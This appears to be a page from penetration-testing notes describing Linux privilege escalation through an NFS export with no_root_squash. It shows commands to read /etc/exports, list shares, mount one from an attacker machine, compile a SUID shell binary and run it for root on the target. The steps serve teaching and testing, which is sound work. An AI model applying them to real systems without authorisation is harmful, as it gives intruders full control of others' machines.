NFS

Refer to the following notes for more information on NFS:

From the target machine (remote shell)

The NFS (Network File Sharing) configuration is found in the /etc/exportsfile. The important element for privilege escalation is present with the no_root_squash value. With this value, we are able to create a SUID executable binary on the target machine via the NFS connection, and execute it to gain a root shell.

$ cat /etc/exports
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
...

We can use the showmount command to show the mountable shares on the target machine (from our attacker machine)

$ showmount -e <target_ip_add>
Export list for <target_ip_add>:
/tmp                      *
/home/backup              *

$ nmap --script=... <target_ip_addr>

To be ran as root on the attacker machine (mount the file system for the target machine)

Create temporary directory
Mount the shares on the target machine (the mount point should be one with the no_root_squash option set)
Create a C program to gain root shell
Compile the C code to binary
Set the SUID bit on the output binary

root@attacker# mkdir /tmp/tmp_mnt_folder
root@attacker# mount -o rw <target_ip_addr>:<mount_point> /tmp/tmp_mnt_folder
root@attacker# nano shell.c
...
...

root@attacker# gcc shell.c -o shell
root@attacker# chmod +s shell

On the target machine

Navigate to the directory where the SUID bit binary is present
Run the binary to gain a root shell

$ ./shell

root@target# id
...

Previous$PATH NextWindows

Last updated 6 days ago